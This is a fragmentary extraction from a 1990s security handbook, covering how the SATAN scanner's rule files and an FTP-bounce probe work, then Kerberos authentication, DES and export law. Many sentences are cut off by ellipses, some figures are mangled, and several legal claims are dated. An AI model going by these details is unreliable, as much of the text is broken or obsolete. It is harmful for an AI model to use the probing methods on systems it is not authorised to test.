$target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is

This entry indicates that if a SATAN record includes the text runs rexd, a new SATAN fact is
added (assert) to the facts file: this fact says that the $target that has a runs rexd entry (as a
result of the rpc
...

The remaining entries in the default SATAN facts file look for
old ftpd versions, and the existence of a modem on a TCP port
...
If this problem
could be detected by the banner given by a vendor’s telnetd, this vulnerability could be
detected by adding an entry into this facts file
...
2
...
4
...
2
...
4/
$target|assert|a|uw|ANY@$target|ANY@ANY|Telnetd access|telnetd is vulnerable

This is making further assumptions about the problem that may or may not be accurate; the
example is just for illustration of the process
...

The file consists of a major section (CLASS class_name) that is just used for reporting,
followed by the real rules
...

Looking at the Ultrix CLASS of the satan-1
...
1/rules/hosttype, three rules are used to identify
various versions of Ultrix:
CLASS Ultrix
/ultrix[\/v ]+([
...
In the first case, the $1 corresponds to the information that matches to
those parts inside the ()
...
The file is
broken into two parts: SERVERS and CLIENTS
...
If that rule evaluates to true, the second field is
assumed to be provided (if under SERVER) or used (if under CLIENT)
...

Here is an example from the satan-1
...
1/rules/services file:
/offers gopher/
/offers http/

Gopher
WWW

Notice that this services file is used by SATAN when generating a Results screen or a report
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

532

Part II: Gaining Access and Securing the Gateway

todo
The todo file specifies probes to try based on existing facts
...

Here is an example from the satan-1
...
1/rules/todo file:
$service eq “ypserv”
$service eq “rexd”

$target “ypbind
...
satan”

The rules indicate that if the $service field of a record in the SATAN facts database is either
“ypserv” or “rexd”, SATAN should run either “ypbind
...
satan” against the $target
indicated in that record
...
If, for example, a user would find a vulnerability against the echo service, the user could create an echo
...
satan”

trust
The trust file contains rules that are used by SATAN to classify hosts on the basis of trust
...

Here is an example from the satan-1
...
1/rules/trust file:
$text =˜ / mounts \S+/
/serves nis domain/

NFS export
NIS client

The first entry indicates that if the $text field of a fact contains the word mounts followed by a
string, this system is exporting NFS file systems
...


Extending SATAN
A new probe can be added to SATAN by creating a new
...
Then the tool name must be explicitly added to the satan
...

The tool can be conditionally invoked using the rulesets, if so desired, as discussed previously,
by added it to the satan
...
Finally, ruleset changes can be added, if so desired,
and new documentation describing the vulnerability and how to deal with it is a worthwhile
addition
...
The goal of ftpbounce
...
If the remote ftpd
permits a PORT command with an IP address that is different from the originating source,
and a TCP port that is reserved, the ftpd is open to this problem
...
satan is to copy ftp
...
satan and make
appropriate modifications
...
satan tool must output fact records, and using the existing
approach from current
...
) Here is a clip from ftp
...
foo
dele $$
...
satan script is ready to be listed in the heavy scan listing in satan
...
At this
point, an HTML document describing the fix (“Get the patch from a vendor, or the latest
wu-ftpd”) should be added into the links available on the tutorials Web page
...
satan tool and the new Web pages should be sent to the creators of SATAN for
inclusion into new versions of the program
...
com
...
It can be written in any language as long it
takes an argument specifying the target name and emits records that comply to the facts
database format
...
satan
tools are written in PERL but call compiled programs, such as nfs-chk (which is written in C)
...
SATAN can be used
to assist security administrators in enforcing company policies, such as preventing unrestricted
NFS exports or X server access
...
SATAN can be used to do
such auditing remotely
...


Works Cited
Alighieri, Dante
...
Norton Anthology of World Masterpieces, Volume 1, 4th Edition
...
W
...

Belgers, Walter
...
win
...
nl/pub/
security/UNIX-password-security
...
Z; INTERNET
...
“Security Problems in the TCP/IP Protocol Suite,” 1993, available from
ftp://ftp
...
att
...
ps
...

Farmer, Dan and Wietse Venema
...
win
...
nl/pub/security/admin-guide-tocracking
...
Z; INTERNET
...
“CIAC Bulletin G-4: X Authentication Vulnerability,” 1995, available from
http://ciac
...
gov; INTERNET
...
, “A Taxonomy of Computer Program Security Flaws, with Examples,”
Naval Research Laboratory, NRL/FR/5542—93-9591, 1993
...
“Infowar: Can bits really replace bullets?” EE Times, Nov 6, 1995
...
“Addressing Weaknesses in the Domain Name
System Protocol,” 1993, available from ftp://coast
...
purdue
...

U
...
Department of Defense, Trusted Computer System Evaluation Criteria, 1985a, available
from ftp://ftp
...
org/pub/info/orange-book
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

535

Kerberos

AP

ER
PT

CHAPTER CH

A

identity before using its services
...

One approach is for the service to trust the authentication performed by the client system
...

Unfortunately, a workstation is under the complete
control of its user
...
A secure
network service cannot rely on the integrity of the
workstation to perform a reliable authentication
...
It
enables users communicating over networks to prove their identity to each other while
optionally preventing eavesdropping or replay attacks
...
Kerberos provides real-time authentication in an insecure distributed environment
...
To solve the same problems and to provide
European companies with a compatible product, another project has been started in
Europe
...


How Kerberos Works
The Kerberos model is based on a trusted third-party authentication protocol
...

Kerberos is publicly available and has seen wide use
...

A ticket, which is a sequence of a few hundred bytes, can be embedded in virtually any
network protocol
...
Although most implementations of Kerberos use TCP/IP,
some implementations use other protocols
...
Data stream mechanisms, such as SOCK_STREAM or
RPC, can also use it as the implicit authentication system
...

Kerberos is only a part of a security implementation
...
Kerberos provides services in
the first two areas:
s It provides mutual authentication and secure communication between principals on an
open network
...

Using Kerberos on time-sharing machines greatly weakens its protections
...
Dumb terminals and most X terminals do not understand
the Kerberos protocol
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

537

Kerberos

In a Kerberos system, a designated site on the network, called the Kerberos authentication server,
performs centralized key management and administrative functions
...
It generates session keys whenever two users want
to communicate securely and authenticates the identity of a user who requests secured network
services
...
If the server is compromised, the integrity of the whole system fails
...
Each realm has its own
authentication server, and implements its own security policy
...
A realm can accept authentications from other realms or not accept
them without a re-authentication if the information security policy requires re-authentication
...
That is, each realm may have child realms, and each realm may have
a parent
...
If an organization has a corporate-wide user naming policy, for example, it is
possible for a user authenticating in one Kerberos realm to connect to a computer in another
realm without requiring re-authentication
...
Specifically, if an organization ABC
...
9
...

If a user authenticates to the realm RESEARCH
...
COM and wants to use information
from PAYROLL
...
COM, there is no need to re-authenticate
...
COM
...


Figure 9
...


ABC
...
COM

Payroll

Operations

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

538

Part II: Gaining Access and Securing the Gateway

On the other hand, if a user authenticates to DEF
...
ABC
...
COM before sharing information
...
If the two companies want to accept each other’s authentication, the
two root Kerberos servers ABC
...
COM need to share an encryption key
...
COM can authenticate as a user to ABC
...


RFCs
An RFC is a request for comment
...
The RFC describes the protocol or standard the issuer would
like to see adopted
...
RFC 1510,
however, describes version 5 of Kerberos
...
It is available from the following:
ftp://ftp
...
edu/in-notes/rfc1510
...


Goals of Kerberos
The design of Kerberos has goals in three areas: authentication, authorization, and accounting
...

There is much discussion in the security industry of how particular systems fit into the
government-trusted host classification system
...
It can, however, be used as
a component when building a secure network
...


Authentication
Any user can make a claim to an ID
...
During basic
authentication, the user is asked to provide a password
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Alternatively, the user can be asked to provide biometric measurements (thumbprints, voiceprints, or retinal scans) to authenticate the claim to that ID
...
This authentication server can be physically secured, and can be controlled to ensure its reliability
...


Authorization
After a user has been authenticated, the application or network service can administrate
authorization
...

Kerberos’ goal is to provide a trusted authentication of the ID on which a system can base its
authorizations
...
In addition, accounting audits users’ activities to ensure
that responsibility for an action can be traced to the initiator of the action
...

Security of the accounting and auditing system is important
...

The goal of Kerberos is to permit attachment of an integrated, secure, reliable accounting
system
...

The authentication process proceeds as follows:
1
...
9
...

These credentials can be directly for an application server or for a Ticket Granting Server
...
The authentication server responds with these credentials, encrypted in the client’s key
(see fig
...
2 [Message 2])
...

s A temporary encryption key (called a session key)
...
If the ticket is for a Ticket Granting Server, the client then requests a ticket for the
application server from the Ticket Granting Server (see fig
...
2 [Message 3])
...
The Ticket Granting Server replies with a ticket for the application server (see fig
...
2
[Message 4])
...
The client transmits the ticket (which contains the client’s identity and a copy of the
session key, all encrypted in the server’s key) to the application server (see fig
...
2
[Message 5])
...
The session key, now shared by the client and application server, is used to authenticate
the client, and can be used to authenticate the server (see fig
...
2 [Message 6])
...


Figure 9
...


1

2

Kerberos
ticket granting
server

3
4

5
Kerberos
client

Kerberos
application
server

6

An implementation consists of one or more authentication servers running on physically secure
hosts
...
Code libraries on the server provide encryption and implement the
Kerberos protocol
...

A client can use two methods for asking a Kerberos server for credentials
...
The reply is sent encrypted in the client’s secret key
...

s Client sends a request to the Ticket Granting Server in the same manner as when
contacting any other application server that requires Kerberos credentials
...

After credentials are obtained, they can be used to establish the level of security the application
requests:
s Verify the identity of the principals in a transaction
s Ensure the integrity of messages exchanged between them
s Preserve privacy of the messages
The application can choose whatever level of protection it deems necessary
...

To verify the identities of the principals in a transaction, the client transmits the ticket to the
function server
...
Parts of it are encrypted, but this encryption doesn’t thwart replay
...
So, additional information accompanies the message to
prove it originated at the principal to whom the ticket was issued
...
The timestamp proves
that the message was generated recently and is not a replay
...
Because no one except
the requesting principal and the server know the session key (it never travels over the network
in the clear), this guarantees the identity of the client
...
This approach provides detection both of replay attacks and message stream
modification attacks, by generating and transmitting a collision-proof checksum called a hash
or digest of the client’s message, keyed with the session key
...

Privacy and integrity of the messages exchanged between principals can be secured by using the
session key passed in the ticket and contained in the credentials to encrypt the data to be
passed
...
Sometimes
the entries in the database must be modified, however, such as when adding new principals
or changing a principal’s key
...
The administration
protocol is not described here
...


What Kerberos Doesn’t Do
Kerberos doesn’t solve denial of service attacks
...

Detection and solution of such attacks, some of which can appear to be common failure modes
for the system, usually is best left to the human administrators and users
...
If an intruder somehow steals a principal’s key,
the villain can masquerade as that principal or impersonate any server to the legitimate
principal
...
If a user chooses a poor password, an
attacker can successfully mount an off-line dictionary attack
...

Kerberos is also vulnerable to clock synchronization attacks
...
This synchronization serves
to reduce the bookkeeping needs of application servers when they perform replay detection
...
If the clocks are synchronized over the
network, the clock synchronization protocol must itself be secured from network attackers
...
A typical mode of access control uses Access
Control Lists to grant permissions to particular principals
...
The list should consist only of principal identifiers,
although group identifiers are ususally allowed
...
If the user is listed as an authorized
principal, access is granted
...
Not reusing
principal identifiers erases the danger of inadvertent access
...
This entire problem is refered to as object reuse
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Encryption
Kerberos uses encryption to protect information passing over the network
...

An encryption system is a set of rules or operations to be applied to the message
...
The original message is called
plaintext
...


Note Encryption is a procedure to convert plaintext into ciphertext, and decryption is a
procedure to convert ciphertext into plaintext
...
Many encryption systems have been patented, including
DES and RSA
...
S
...
Hellman, W
...
Merkle, issued 4/29/80 and in U
...
Patent
4,218,582, by M
...
Merkle, issued 8/19/80
...
Public Key Partners, of Sunnyvale, California holds exclusive licensing
rights to both patents, as well as the rights to the RSA patent
...
Any commercial implementation of Kerberos will be subject to the
license granted for the encryption system
...

The NSA is the U
...
government’s official communications security body
...
The NSA is the largest employer of mathematicians and the largest purchaser of
computer hardware in the world
...
For reasons of national security, almost all information about the NSA is classified
...

As the premier cryptographic government agency, the NSA has enormous financial and
computer resources
...

This secrecy has led to many rumors about the NSA’s capability to break popular cryptosystems like DES and that the NSA secretly has placed weaknesses, called trapdoors, in DES
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

543

544

Part II: Gaining Access and Securing the Gateway

The NSA exerts influence over commercial cryptography in several ways
...
S
...
It does, however, approve for export
any products used for authentication only, no matter how large the key size, as long as the
product cannot be converted to be used for encryption
...
Additionally, the
NSA serves an advisory role to NIST (National Institute of Standards and Technology, a
division of the U
...
Department of Commerce) in the evaluation and selection of official U
...

government computer security standards
...
The NSA also can exert market pressure on U
...
companies to produce (or
refrain from producing) encryption products, because the NSA itself often is a major customer
for these same companies
...
As a result, any distribution of encryption that is legal within the U
...
is also
legal into Canada
...


Private, Public, Secret, or Shared Key Encryption
There is a wide range of terminology in use for only two concepts
...
An algorithm that depends on a key that must remain private is a secret key
system
...
Because
Kerberos shares the secret key among a small group of principals, it is often referred to as
a shared secret key system
...
An algorithm that permits a key to be published is called a public key system
...

If a system depends on a secret key, the intention clearly is to prevent usage by anyone who
lacks the key
...

A public key system is actually a dual key system
...
Anyone with
the public key may encrypt a message to the holder of the private key, and be confident that
only one individual has access to the message
...
Anyone who decrypts the message with
the public part of the key can be confident that the message could only have originated from
one individual
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

The primary advantage of public-key cryptography is increased security
...
In a secret-key system, by contrast, the
potential always exists for an enemy to discover the secret key during transmission
...
Certain popular
secret-key encryption methods are significantly faster than any currently available public-key
encryption methods
...
Although Kerberos can be implemented with a public key encryption system, the option to encrypt all data between principals
leaves the potential for very large amounts of encryption to take place
...
With this in mind, Kerberos has been designed to handle the problem of secure
distribution of secret keys
...

The encryption function uses the key to generate a mapping of the plaintext into the
ciphertext
...
Such systems, in which the same key value is used to
encrypt and decrypt, also are known as symmetric cryptosystems
...


DES and Its Variations
Originally developed by IBM, DES stands for Data Encryption Standard, an encryption block
cipher
...
S
...
The
details can be found in the official FIPS (Federal Information Processing Standards) publication
...

DES is a secret-key, symmetric cryptosystem
...
DES was designed to be implemented in hardware operates relatively fast
(compared to other encryption systems) on 64-bit blocks with a 56-bit key
...

DES has been recertified as an official U
...
government encryption standard every five years
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

545

546

Part II: Gaining Access and Securing the Gateway

As far as is known, DES never has been broken with a practical attack, despite the efforts of
many researchers over many years
...
This takes 255 steps on average
...
Wiener estimated the cost of a specialized
computer to perform such an exhaustive search at one million dollars—a sum within the
budget of a moderate-sized corporation, or a special interest group
...
These ideas have fostered doubts about
the security of DES
...

The consensus is that DES, used properly, is secure against all but the most powerful enemies
...
Biham and Shamir have stated
that they consider DES secure
...

One should change DES keys frequently, to prevent attacks that require sustained data
analysis
...

DES can be used for encryption in several officially defined modes
...
S
...
Some are more secure
than others
...
Encrypts each 64-bit block of plaintext consecutively
under the same 56-bit DES key
...

s CBC (Cipher Block Chaining)
...
Thus, the encryption of each block depends on previous blocks and the same 64-bit plaintext block
encrypts to different ciphertext, depending on its context in the overall message
...

s CFB (Cipher Feedback)
...
It uses the
previously generated cyphertext as input to DES to create a randomizer to combine with
the next block of plaintext
...

s OFB (Output Feedback Mode)
...
OFB is not as secure as CFB
...
Software implementations in

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

general purpose computers are not in compliance with this standard
...


Encryption Export Issues
All cryptographic products need export licenses from the State Department, acting under
authority of the International Traffic in Arms Regulation (ITAR)
...
The U
...
government has historically been reluctant
to grant export licenses for encryption products it sees as stronger than a certain non-publicly
assigned level
...
Export
jurisdiction then can be passed to the Department of Commerce, whose export procedures
generally are simple and efficient
...
The
NSA sometimes becomes directly involved at this point
...

The NSA has de facto control over export of cryptographic products
...
Therefore, policy decisions concerning exporting cryptography ultimately rest with
the NSA
...
Its
concern lies only with the use of cryptography for privacy
...
This is true even for very strong systems,
such as RSA with large key sizes
...
An authentication product needs NSA and
State Department approval only once, whereas an encryption product could need approval for
every sale or every product revision
...
S
...
The government rarely approves export of DES, although DES is widely available
overseas
...
These products are functionally compatible with U
...
products
...
S
...

Export policy currently is a matter of great controversy
...
The Software Publishers
Association (SPA), a software industry group, has recently been negotiating with the government to get export license restrictions eased
...
Also, export policy is less restrictive for foreign subsidiaries and overseas offices of U
...

companies
...
The Board is an
official advisory board whose members are drawn from the government and the private sector
...
National security and law enforcement agencies like restrictions on
cryptography, especially for export, whereas other government agencies and private industry
want greater freedom for using and exporting cryptography
...
U
...
export policy could undergo
significant changes in the next few years
...
You can access it using the following URL:
http://web
...
fr/Network/Crypto/

In much of the civilized world, encryption is legal or at least tolerated
...
Some countries in which encryption is illegal
are Russia, France, Iran, and Iraq
...
Encryption is used to prove the identities of the network entities participating in message exchanges
...
Proof of knowledge of
this secret key is used to verify the authenticity of a principal
...
The capability to obtain the secret key or session key implies
knowing the appropriate keys and the identity of the Key Distribution Center
...
Likewise, the capability of
the service to extract the session key from the ticket and prove its knowledge thereof in a
response verifies the identity of the service
...

Sometimes, though, the order of fields in the encrypted portions of messages is arranged to

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

minimize the effects of poorly chosen keys
...
If keys are
derived from user-typed passwords, those passwords need to be chosen well to make brute
force attacks more difficult
...

The following sections specify the encryption and checksum mechanisms currently defined
for Kerberos and describe the encoding, chaining, and padding requirements for each
...
The requirements for a confounder are specified along with
each encryption mechanism
...
These chaining methods often don’t provide an integrity check upon
decryption
...
Such checksums should be good at detecting burst errors in the input
...
Each encryption type is expected to provide and verify an
appropriate checksum
...

Finally, if a key is to be derived from a user’s password, an algorithm for converting the
password to a key of the appropriate type is required
...
An attacker compromising the
Kerberos server in one realm should not be able to just obtain or derive the user’s key in
another realm
...
The encrypted field that appears in
the unencrypted part of messages is a sequence that consists of an encryption type, an optional
key version number, and the ciphertext
...
Identifies the encryption algorithm used to encrypt the cipher
...
Contains the version number of the key under which data is encrypted
...
Used to
determine which key to use when a ticket is valid across a change in key, such as when a
user changes his password
...
Contains the encrypted field(s)
...
Encryption mechanisms defined for use with
Kerberos must take sufficient measures to guarantee the integrity of the plaintext
...

The suggested format for the data to be encrypted includes a confounder, a checksum, the
encoded plaintext, and any necessary padding
...
The format for the data to be encrypted is described
in the following:
{
confounder[0]
check[1]
msg-seq[2]
pad

BYTE STRING(conf_length)
OPTIONAL,
BYTE STRING(checksum_length) OPTIONAL,
MsgSequence,
BYTE STRING(pad_length)
OPTIONAL

}

The first step is to create a confounder
...
Its purpose is to confuse or confound certain types of brute
force attacks
...
Next, calculate the appropriate
checksum over confounder, the zeroed checksum, and the message
...
Add the necessary padding to bring the total length to a multiple of the encryption
blocking length
...

Unless otherwise specified, a definition of a Kerberos encryption algorithm uses this ciphertext
format
...
Additionally, messages
encoded in this format must include a length as part of the message field, to enable the
recipient to verify that the message has not been truncated
...

To enable all implementations using a particular encryption type to communicate with all
others using that type, the specification of an encryption type defines any checksum needed as
part of the encryption process
...

Some encryption systems require additional information beyond the key and the data to be
encrypted
...
If required, the description for each encryption type must specify the
source of such additional information
...
The following structure shows the
encoding of an encryption key:

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

EncryptionKey = {
keytype[0]
keyvalue[1]

INTEGER,
BYTE STRING

}

s keytype
...
It almost
always corresponds to the encryption algorithm used to generate the encrypted data,
though more than one algorithm may use the same type of key (the mapping is many to
one)
...

s keyvalue
...

All negative values for the encryption key type are reserved for local use
...


Encryption Systems
Kerberos defines a number of encryption systems that may be selected for use in a message
...

When a principal sends a message using an encryption method, the destination principal must
also support the encryption method
...


The NULL Encryption System (null)
If no encryption is in use, the encryption system is said to be a NULL encryption system
...
The ciphertext simply is
the plaintext
...


DES in CBC Mode with a CRC-32 Checksum (des-cbc-crc)
The des-cbc-crc encryption mode encrypts information under the Data Encryption Standard
using the Cipher Block Chaining (CBC) mode
...
The details of the
encryption of this data are identical to those for the des-cbc-md5 encryption mode
...
An attacker could use a probabilistic chosen plaintext attack to
generate a valid message, even in the face of a confounder
...
Any time
the message will pass through a hostile environment, such as the Internet, or any time the
message has great value, as in financial transactions, a collision-proof checksum should be used
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

551

552

Part II: Gaining Access and Securing the Gateway

DES in CBC Mode with an MD4 Checksum (des-cbc-md4)
The des-cbc-md4 encryption mode encrypts information under DES using the Cipher Block
Chaining mode
...
The details of the encryption of this data are identical to
those for the des-cbc-md5 encryption mode
...
An MD5 checksum is applied to the confounder and
message sequence and placed in the cksum field
...
As a result, the data to be encrypted must be padded to
an 8-byte boundary before encryption
...
Unless otherwise specified, zero should be used as the initialization
vector
...

The DES specifications identify some weak and semi-weak keys
...
Because of the way that keys are derived for the encryption
of checksums, keys shall not be used that yield weak or semi-weak keys when eXclusive-ORed
with the constant F0F0F0F0F0F0F0F0
...
This consists of 56 bits of key, and 8 parity
bits (one per byte)
...
This string is then fan-folded and eXclusive-ORed with itself to form an
8-byte DES key
...
Next, parity is corrected
on the CBC checksum
...
Finally, the
result is returned as the key
...
Indicates the algorithm used to generate the accompanying checksum
...
Contains the checksum itself, encoded as byte string
...
All non-negative values are
reserved for officially assigned type fields and interpretations
...
In addition, specific implementations may also
support implementation-specific checksums
...
Selection of a specific checksum is up to the application
providing the information
...


A checksum is said to be collision-proof if finding two plaintexts that generate the same
checksum value is infeasible
...
Any change to the message makes
an unpredictable change to the checksum
...
Keyed checksums are
usually cryptographically based
...

To prevent message-stream modification by an active attacker, unkeyed checksums should be
used only when the checksum and message will be subsequently encrypted
...

Collision-proof checksums can be made tamperproof as well if the checksum value is encrypted
before inclusion in a message
...
RSA-MD5 encrypted using DES is a
new checksum algorithm of type RSA-MD5-DES
...


The CRC-32 Checksum (crc32)
The CRC-32 checksum calculates a checksum based on a cyclic redundancy check as described
in ISO 3309
...
The CRC-32 is neither keyed nor
collision-proof
...
Use collision-proof checksums
for environments in which such attacks represent a significant threat such as the Internet, or an
application with high value information
...
The
algorithm takes a message of arbitrary length as input and outputs a 128-bit (16-byte)
checksum
...


RSA MD4 Cryptographic Checksum Using DES (rsa-md4-des)
The RSA-MD4-DES checksum calculates a keyed collision-proof checksum and requires an
8-byte confounder before the text
...
It uses a variant of the session key, where the variant is computed by eXclusive-ORing
the key with the constant F0F0F0F0F0F0F0F0
...
The constant F0F0F0F0F0F0F0F0 was chosen
because it maintains key parity
...
The resulting
checksum is 24 bytes long, 8 bytes of which are redundant
...


The RSA MD5 Checksum (rsa-md5)
The RSA-MD5 checksum uses the RSA MD5 algorithm to calculate a checksum
...
RSA-MD5 is collision-proof
...
The
resulting checksum is 24 bytes long, 8 bytes of which are redundant
...


DES Cipher Block Chained Checksum (des-mac)
The DES-MAC checksum is computed by prepending an 8-byte confounder to the plaintext
and using the session key to perform a DES CBC-mode encryption on the result
...
It encrypts the same confounder and the last 8-byte block of the
ciphertext using DES in Cipher Block Chaining mode and a variant of the key as described in
rsa-md4-des
...
The resulting checksum is 128 bits (16
bytes) long, 64 bits of which are redundant
...


RSA MD4 Cryptographic Checksum Using DES Alternative
(rsa-md4-des-k)
The RSA-MD4-DES-K checksum calculates a keyed collision-proof checksum
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

The DES key is used as both key and initialization vector
...
This checksum is tamperproof and collision-proof
...
It is
supported to provide backward compatibility
...
The last block of the ciphertext is used as the checksum value
...
Any uses that do not specify an additional initialization vector will use the key as both key and initialization vector
...
This checksum is tamperproof and collision-proof
...
It is
supported to provide backward compatibility
...
Most of them are based
on MIT distributions in one form or another, but the lineage isn’t always simple to trace
...
Versions 4 and 5 are based on completely
different protocols
...

s A program enables users to convert a version 4 format Kerberos database to a version 5
format database
...

Some distributions are freely available, some are stand-alone commercial products, and others
are part of a larger free or commercial system
...
Because version 4 is not totally compatible with version 5, organizations starting new Kerberos installations should consider starting
at version 5
...
S
...
mit
...
71
...
38)
...
KRB4 (for version 4) or README
...
Locations outside
North America may use the Bones version
...
Years ago, the designers of AFS decided to implement their own security system
based on the Kerberos specification rather than using MIT Kerberos version 4, which then was
not publicly available
...
They can, in principal,
talk to each other
...


DEC Ultrix Kerberos
A third distribution of Kerberos version 4 is available from Digital Equipment Corporation
...


Versions of Kerberos Version 5
Version 5 of Kerberos is the most recent version
...


MIT Kerberos Version 5
MIT Kerberos version 5 is freely available and is available from the same site as version 4 MIT
via anonymous FTP from athena-dist
...
edu (18
...
0
...


OSF DCE Security
The Open Systems Foundation (OSF) has defined a Distributed Computing Environment
(DCE) with security based on Kerberos version 5, and using the same wire protocol
...
Because DCE is defined as an open standard, it is up to
manufacturers to provide products that fit into that standard
...


Bones
Kerberos is a network security system that relies on cryptographic methods for its security
...
Bones is a system
that provides the Kerberos API without using encryption and without providing any form of
security—it’s a fake that enables the use of software that expects Kerberos to be present when it
cannot be
...
It neither
has any encryption routines nor any calls to encryption routines
...
funet
...
214
...
100) in pub/unix/security/kerberos
...


SESAME
SESAME is an initiative of the European community to produce a compatible product to
Kerberos version 5
...
SESAME makes use of DES software developed outside North America, and is not
subject to export restrictions
...
esat
...
ac
...
html
...

TGV, Inc
...
Because
Kerberos installations tend to require a considerable amount of customization, you should
inspect consulting support
...
A good consultant who has experience installing Kerberos
can greatly improve your chance of completing the project on time and within budget
...
The result is that products
from different vendors do not always talk to each other
...


DEC ULTRIX Kerberos
DEC ULTRIX contains Kerberos for a single reason, namely, to provide authenticated name
service for the ULTRIX enhanced security option
...

DEC’s version essentially is the same as, and is derived from, MIT Kerberos version 4, except
for a few changes
...
The most significant change is that the capability to perform any kind of end-to-end user data encryption has
been eliminated to comply with export restrictions
...
Some other minor changes probably have
been made as well
...


Transarc’s Kerberos
Transarc’s Kerberos uses a different string-to-key function (the algorithm that turns a password
into a DES key) than MIT Kerberos
...
A program that uses a password to acquire a
ticket (for example, kinit or login) works only with one version, unless modified to try both
string-to-key algorithms
...
MIT Kerberos uses krb
...
realms to map hostnames to realms and realms to Kerberos servers
...
This means that a program built using the MIT Kerberos libraries looks in one
place for the information while a program built using the AFS Kerberos libraries looks in
another
...

The two versions have a different password-changing protocol, so you must use the correct
“kpasswd” program for the server with which you connect
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

In summary, AFS Kerberos and MIT Kerberos can interoperate after you acquire a Ticket
Granting Ticket, which you can do with kinit (MIT) or klog (AFS)
...
However, it is probably best to pick one implementation and use it
exclusively
...


DCE
DCE Security started from an early alpha release of version 5 and the two versions have
developed independently
...

The DCE Security Server, secd, listens on UDP port 88 for standard Kerberos requests and
responds appropriately
...

An MIT Kerberos version 5 server cannot replace the DCE Security Server
...
Second, the DCE Security
model includes a Privilege Server that fills in the authorization field of a principal’s ticket with
DCE-specific data, and the DCE Security Server has a built-in Privilege Server
...

As an additional complication, the DCE does not officially export the Kerberos version 5 API
...
Individual vendors can provide the Kerberos
version 5 API if they want, but unless they all do (which seems unlikely) Kerberos version 5
API applications will not be compile-time portable to pure DCE environments
...


Interoperability Requirements
Version 5 of the Kerberos protocol supports a myriad of options, including multiple encryption and checksum types, alternative encoding schemes, optional mechanisms for preauthentication, the handling of tickets with no addresses, options for mutual authentication,
user-to-user authentication, support for proxies, forwarding, postdating and renewing tickets,
formatting realm names, and handling authorization data
...
This minimal configuration is subject to change as technology does
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

559

560

Part II: Gaining Access and Securing the Gateway

Specification 1
Specification 1 is the first definition of a standard set of these options
...


Encryption and Checksum Methods
The following encryption and checksum mechanisms must be supported
...
500 style
...


Transited Field Encoding
DOMAIN-X500-COMPRESS must be supported
...


Preauthentication Methods
The TGS-REQ method must be supported
...
Clients must support the PA-ENC-TIMESTAMP method, but whether it is enabled
by default may be determined per realm
...
Servers need not support the PA-ENCTIMESTAMP method, but if not supported, the server should ignore the presence
of PA-ENC-TIMESTAMP preauthentication in a request
...


Ticket Addresses and Flags
All Key Distribution Centers must pass on tickets that carry no addresses
...
Each

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

realm may set its own policy for issuing such tickets, and each application server sets its own
policy concerning accepting them
...

Proxies and forwarded tickets must be supported
...

All implementations must recognize renewable and postdated tickets, but need not actually
implement them
...
When a server decodes a postdated ticket, all implementations make the presence of the postdated flag visible to the calling server
...
Individual realms can decide as a matter of policy to reject such requests on
a per-principal or realm-wide basis
...
Passing on a subfield is never correct, and no registered subfield types
presently specify suppression at the Key Distribution Center
...
Implementations are not required to permit clients to specify the
contents of the authorization data fields
...
Each type of name has its own rules, structure,
and limitations
...

To enforce these conventions, each realm must conform to the conventions
...

Presently, the four styles of realm names are domain, X
...
Examples of
each style follow:
domain:
X500:
other:
reserved:

host
...
domain
C=US/O=OSF
NAMETYPE:rest/of
...
Domain names must look like
Internet domain names
...
) and contain
neither colons (:) nor slashes (/)
...
500 names to remain consistent with other naming conventions in
use within the organization
...
500 names contain an equal sign (=) and cannot contain a colon
(:) before the equal sign
...
500 names are string representations of the
names with components separated by slashes (leading and trailing slashes not included)
...
Names that fall into the other category must begin
with a prefix that contains no equal sign (=) or period (
...
All prefixes must be assigned before they may be used
...

Finally, a category of names is left for future use
...
All names in this category are reserved
...

These rules guarantee no conflicts between the various name styles
...
500 categories
...
500 formats must be used by organizations that own an Internet
domain name or X
...
If no such names are registered, authority to use a realm name
may be derived from the authority of the parent realm
...
MIT
...
EDU realm can authorize the creation of a
realm of that name
...
500 and domain name systems
as well
...
500 hierarchy, the parent is responsible for ensuring that a name identical to the realm name
of the child does not exist in the future unless assigned to the child
...
The name-type field that is part of the principal
name indicates the kind of information implied by the name
...
Ignoring the name type, no two names can be the same
...
An example of a principal name is a username of
JSmith
...
ABC
...
The following name types are defined:
Name Type

Value

Meaning

NT-UNKNOWN

0

Name type not known

NT-PRINCIPAL

1

Just the name of the principal as in DCE, or for users

NT-SRV-INST

2

Service and other unique instance (krbtgt)

NT-SRV-HST

3

Service with host name as instance (telnet,
rcommands)

NT-SRV-XHST

4

Service with host as remaining components

NT-UID

5

Unique ID

When a name implies no information other than its uniqueness at a particular time, the name
type PRINCIPAL should be used
...
If the name is a unique machine-generated ID guaranteed never to be reassigned, then the name type of UID should be used
...

Reassigned names could acquire rights to information that were not intended
...

If the first component of a name identifies a service and the remaining components identify an
instance of the service in a server-specified manner, then the name type of SRV-INST should
be used
...


p1vPHCP/nhb1

